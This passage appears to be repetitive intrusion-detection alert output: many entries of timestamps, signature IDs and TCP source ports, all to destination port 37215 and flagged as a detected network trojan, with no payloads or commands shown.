          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461015
          SID:2835222
          Source Port:48620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884180
          SID:2829579
          Source Port:35824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157238
          SID:2835222
          Source Port:50000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407300
          SID:2835222
          Source Port:38042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176087
          SID:2829579
          Source Port:50424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263950
          SID:2829579
          Source Port:47990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241331
          SID:2835222
          Source Port:47360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273350
          SID:2829579
          Source Port:60904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018562
          SID:2835222
          Source Port:52084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.107942
          SID:2835222
          Source Port:49384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160911
          SID:2829579
          Source Port:57346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601243
          SID:2835222
          Source Port:47172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273370
          SID:2829579
          Source Port:47022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542657
          SID:2829579
          Source Port:38516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467594
          SID:2835222
          Source Port:39714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461359
          SID:2835222
          Source Port:49534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513656
          SID:2829579
          Source Port:58586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509327
          SID:2835222
          Source Port:36708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781390
          SID:2835222
          Source Port:54734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.162609
          SID:2829579
          Source Port:47924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107432
          SID:2835222
          Source Port:52374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.801153
          SID:2829579
          Source Port:50194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129609
          SID:2829579
          Source Port:34106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237567
          SID:2835222
          Source Port:36568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855338
          SID:2835222
          Source Port:57164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797926
          SID:2835222
          Source Port:55362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.178469
          SID:2835222
          Source Port:40420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160586
          SID:2829579
          Source Port:53050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444874
          SID:2829579
          Source Port:50496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707254
          SID:2835222
          Source Port:43614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113837
          SID:2829579
          Source Port:55740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.663755
          SID:2835222
          Source Port:51184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241536
          SID:2835222
          Source Port:33490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.833564
          SID:2829579
          Source Port:44958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.827816
          SID:2835222
          Source Port:47442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854330
          SID:2829579
          Source Port:37794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.822550
          SID:2829579
          Source Port:33724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705664
          SID:2835222
          Source Port:44582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176143
          SID:2835222
          Source Port:51550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160558
          SID:2835222
          Source Port:33940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746010
          SID:2829579
          Source Port:53740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.088025
          SID:2835222
          Source Port:33712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894557
          SID:2829579
          Source Port:38250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471306
          SID:2835222
          Source Port:35580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495576
          SID:2829579
          Source Port:39562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157632
          SID:2829579
          Source Port:42494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857896
          SID:2829579
          Source Port:40054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911582
          SID:2829579
          Source Port:58764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.797750
          SID:2829579
          Source Port:51468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.183806
          SID:2835222
          Source Port:60898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.154254
          SID:2835222
          Source Port:52074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.061923
          SID:2829579
          Source Port:48070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896917
          SID:2835222
          Source Port:39982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742422
          SID:2829579
          Source Port:56352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110647
          SID:2835222
          Source Port:34564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351387
          SID:2829579
          Source Port:51834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514263
          SID:2829579
          Source Port:59460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155128
          SID:2835222
          Source Port:36330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.394597
          SID:2829579
          Source Port:46974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173925
          SID:2829579
          Source Port:43180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896986
          SID:2829579
          Source Port:55646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378192
          SID:2829579
          Source Port:43222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264261
          SID:2829579
          Source Port:54548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.408737
          SID:2829579
          Source Port:59680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862490
          SID:2835222
          Source Port:42310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175783
          SID:2835222
          Source Port:38030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798453
          SID:2835222
          Source Port:36738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673036
          SID:2835222
          Source Port:56112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.822774
          SID:2829579
          Source Port:49414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126934
          SID:2829579
          Source Port:34670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512281
          SID:2829579
          Source Port:47376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517828
          SID:2835222
          Source Port:59390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743436
          SID:2835222
          Source Port:41686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410037
          SID:2829579
          Source Port:50752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.862498
          SID:2835222
          Source Port:52266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449500
          SID:2829579
          Source Port:33316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733028
          SID:2835222
          Source Port:39682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784165
          SID:2829579
          Source Port:55434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.296270
          SID:2835222
          Source Port:60628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.172761
          SID:2835222
          Source Port:42114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705528
          SID:2829579
          Source Port:38306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262326
          SID:2835222
          Source Port:37732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.191591
          SID:2829579
          Source Port:33976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.832271
          SID:2835222
          Source Port:46412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786774
          SID:2835222
          Source Port:35984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115289
          SID:2835222
          Source Port:55848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059495
          SID:2829579
          Source Port:59126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175643
          SID:2829579
          Source Port:47534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353290
          SID:2829579
          Source Port:40186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786675
          SID:2835222
          Source Port:59010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.737858
          SID:2829579
          Source Port:34450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912427
          SID:2829579
          Source Port:40562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113691
          SID:2829579
          Source Port:44896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551616
          SID:2829579
          Source Port:53382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783347
          SID:2829579
          Source Port:33248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730949
          SID:2835222
          Source Port:51912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.821013
          SID:2829579
          Source Port:46838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188707
          SID:2829579
          Source Port:46974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271519
          SID:2829579
          Source Port:60188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.162706
          SID:2829579
          Source Port:37502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188186
          SID:2829579
          Source Port:40694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.603290
          SID:2835222
          Source Port:46412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857568
          SID:2835222
          Source Port:58552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115666
          SID:2835222
          Source Port:48912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.829449
          SID:2829579
          Source Port:53334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242793
          SID:2829579
          Source Port:45998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733621
          SID:2835222
          Source Port:35100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240597
          SID:2835222
          Source Port:33254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.892293
          SID:2829579
          Source Port:48612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.749069
          SID:2829579
          Source Port:58602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037062
          SID:2835222
          Source Port:40880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.085446
          SID:2835222
          Source Port:41862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.598697
          SID:2829579
          Source Port:50024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.058639
          SID:2835222
          Source Port:36776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672684
          SID:2835222
          Source Port:49272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.106246
          SID:2829579
          Source Port:55282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.813924
          SID:2829579
          Source Port:49672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.809088
          SID:2835222
          Source Port:37100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.675214
          SID:2835222
          Source Port:35970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792617
          SID:2835222
          Source Port:36202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173220
          SID:2835222
          Source Port:37868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.160464
          SID:2829579
          Source Port:45600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446714
          SID:2835222
          Source Port:53422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.803321
          SID:2835222
          Source Port:52896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741125
          SID:2835222
          Source Port:58672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039228
          SID:2829579
          Source Port:43250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351734
          SID:2829579
          Source Port:41340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786976
          SID:2835222
          Source Port:33904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449332
          SID:2829579
          Source Port:44084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816637
          SID:2835222
          Source Port:56966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857111
          SID:2829579
          Source Port:38630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014893
          SID:2835222
          Source Port:46802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673499
          SID:2829579
          Source Port:50416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745709
          SID:2835222
          Source Port:33556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729207
          SID:2829579
          Source Port:34860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782282
          SID:2829579
          Source Port:58942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816994
          SID:2835222
          Source Port:40814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.134152
          SID:2829579
          Source Port:35532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242306
          SID:2835222
          Source Port:58314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262568
          SID:2835222
          Source Port:33536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111863
          SID:2829579
          Source Port:44260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264303
          SID:2835222
          Source Port:47760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.109144
          SID:2829579
          Source Port:57762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239821
          SID:2835222
          Source Port:35184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157410
          SID:2835222
          Source Port:36060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262123
          SID:2835222
          Source Port:36114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461094
          SID:2835222
          Source Port:45086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179666
          SID:2829579
          Source Port:40910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160298
          SID:2829579
          Source Port:34672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.850691
          SID:2835222
          Source Port:38844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258436
          SID:2829579
          Source Port:51110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.802512
          SID:2835222
          Source Port:54842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462062
          SID:2835222
          Source Port:58152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.841822
          SID:2829579
          Source Port:51656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780499
          SID:2835222
          Source Port:43782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.162744
          SID:2829579
          Source Port:37944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892608
          SID:2835222
          Source Port:54950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.853119
          SID:2835222
          Source Port:55522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175680
          SID:2835222
          Source Port:55068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732329
          SID:2835222
          Source Port:58982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306611
          SID:2829579
          Source Port:34986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.802501
          SID:2835222
          Source Port:47716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444163
          SID:2835222
          Source Port:33528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152871
          SID:2835222
          Source Port:43036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114275
          SID:2835222
          Source Port:34418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.155265
          SID:2835222
          Source Port:45630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354424
          SID:2835222
          Source Port:47736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854993
          SID:2829579
          Source Port:57626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465839
          SID:2835222
          Source Port:42482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.172573
          SID:2835222
          Source Port:51764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.401863
          SID:2835222
          Source Port:50010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.460953
          SID:2835222
          Source Port:50530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263947
          SID:2829579
          Source Port:51646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787476
          SID:2835222
          Source Port:55248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.703644
          SID:2829579
          Source Port:44482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.893804
          SID:2829579
          Source Port:43130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855339
          SID:2829579
          Source Port:60986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107346
          SID:2835222
          Source Port:50176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395340
          SID:2829579
          Source Port:50620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442038
          SID:2835222
          Source Port:57064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551464
          SID:2835222
          Source Port:43962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471299
          SID:2829579
          Source Port:47168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462106
          SID:2829579
          Source Port:41216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796548
          SID:2829579
          Source Port:43868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.794056
          SID:2835222
          Source Port:57892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707145
          SID:2835222
          Source Port:34012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471498
          SID:2835222
          Source Port:56134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514261
          SID:2835222
          Source Port:53074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515489
          SID:2829579
          Source Port:38074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177173
          SID:2829579
          Source Port:35164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263692
          SID:2835222
          Source Port:43542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176296
          SID:2829579
          Source Port:38512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742236
          SID:2829579
          Source Port:35116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114025
          SID:2829579
          Source Port:39838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600966
          SID:2829579
          Source Port:37942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808580
          SID:2829579
          Source Port:33888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.602473
          SID:2835222
          Source Port:54372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
